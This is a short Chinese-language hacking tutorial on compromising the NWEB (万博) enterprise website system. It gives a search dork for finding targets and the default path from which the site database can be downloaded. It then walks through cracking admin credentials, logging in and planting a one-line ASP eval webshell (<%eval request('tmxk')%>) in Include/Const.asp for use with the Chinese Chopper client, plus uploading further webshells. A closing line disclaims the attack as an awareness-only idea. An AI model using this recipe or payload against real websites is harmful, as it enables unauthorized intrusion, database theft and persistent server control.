万博企业网站系统(NWEB System)

关键字:inurl:system/adminlogin.asp

后台地址:http://域名/system/adminlogin.asp

数据库地址:http://域名/Database/NwebCn_Site.mdb

‘网站数据:/Database/NwebCn_Site.mdb (常规内容数据库)
‘     /Database/Bak_NwebCn_Site.mdb (备份内容数据库)
‘     /Database/NwebCn_Stat.mdb (常规流量数据库)
‘     /Database/Bak_NwebCn_Stat.mdb (备份流量数据库)
‘常量配置:/Include/Const.asp (如果你更改过数据库存放路径或文件名,漏洞相应常量在此文件作修改)

利用文件:http://域名/Include/Const.asp

利用代码:<%eval request("tmxk")%>

万博企业网站系统(NWEB System)漏洞渗透拿Webshell-开水网络
漏洞

1.打开目标站点。
2.在目标站点后面加上  /Database/NwebCn_Site.mdb  下载站点数据库,也就是:http://域名/Database/NwebCn_Site.mdb。
3.打开数据库解密文。
4.获取明文后登录后台。
5.在左侧菜单选择“系统管理”→“常规设置”
6.重点来了  在哪里? 你们懂得,就是一句话  看到没   我们把双引号里面的c改成tmxk  然后保存。
7.菜刀连接地址出来了。
8.菜刀连接地址:http://域名/Include/Const.asp,我们直接打开是个空白页 ,你们都懂。
9.既然是空白页  那我们就用菜刀连接试试。
10.连接成功,数据还有点多的,网马什么的就不一一截图出来了,经测试,可直接上传小马、大马等。

这个是网站默认的设置漏洞问题,现在大多网站早就没有这个漏洞了,不要再去实验,只是告诉大家一中渗透思路。同时也提醒大家注意这些细节的安全问题。